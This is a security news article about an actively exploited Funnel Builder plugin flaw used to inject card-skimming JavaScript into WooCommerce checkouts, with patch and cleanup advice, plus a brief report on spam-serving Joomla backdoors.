A significant security flaw has been identified in the Funnel Builder plugin for WordPress, which is actively being exploited to inject malicious JavaScript into WooCommerce checkout pages, aiming to steal sensitive payment information. This vulnerability affects all versions of the plugin prior to 3.15.0.3 and is utilized by over 40,000 WooCommerce stores.
The Dutch e-commerce security firm Sansec recently disclosed details about this exploit. The vulnerability allows unauthenticated attackers to inject arbitrary JavaScript into every checkout page of an affected store. FunnelKit, the developer of Funnel Builder, has addressed this issue by releasing a patch in version 3.15.0.3.
According to Sansec, attackers are embedding counterfeit Google Tag Manager scripts into the plugin’s ‘External Scripts’ setting. These scripts appear as legitimate analytics tags alongside the store’s actual tags but are designed to load a payment skimmer that captures credit card numbers, CVVs, and billing addresses during the checkout process.
The vulnerability stems from a publicly accessible checkout endpoint in Funnel Builder that allows incoming requests to specify the internal method to execute. In earlier versions, there were no checks on the caller’s permissions or restrictions on which methods could be invoked. This oversight enables attackers to send unauthenticated requests that can execute internal methods, writing malicious data directly into the plugin’s global settings. Consequently, the injected code is executed on every Funnel Builder checkout page.
In observed instances, attackers have used payloads disguised as Google Tag Manager loaders to deploy JavaScript hosted on remote domains. These scripts establish a WebSocket connection to an attacker-controlled command-and-control server to retrieve a skimmer tailored to the victim’s storefront. The primary objective is to harvest credit card numbers, CVVs, billing addresses, and other personal information entered by customers during checkout.
To mitigate this threat, site owners are strongly advised to update the Funnel Builder plugin to the latest version immediately. Additionally, they should review the ‘External Scripts’ section under Settings > Checkout for any unfamiliar entries and remove them promptly.
Sansec notes that disguising skimmers as Google Analytics or Tag Manager code is a recurring tactic among cybercriminals, as it allows malicious scripts to blend in with legitimate tracking tags, making them less likely to be detected during reviews.
This disclosure follows recent reports by Sucuri detailing a campaign where Joomla websites were compromised with obfuscated PHP code. These backdoors contact attacker-controlled servers to receive and execute instructions, serving spam content to visitors and search engines without the site owner’s knowledge. The attackers aim to exploit the sites’ reputations to inject spam.
In these cases, the malicious scripts act as remote loaders, contacting external servers, sending information about the infected website, and awaiting further instructions. The response from the remote server dictates the content the infected site should serve, allowing attackers to change the behavior of the compromised website at any time without modifying local files again.
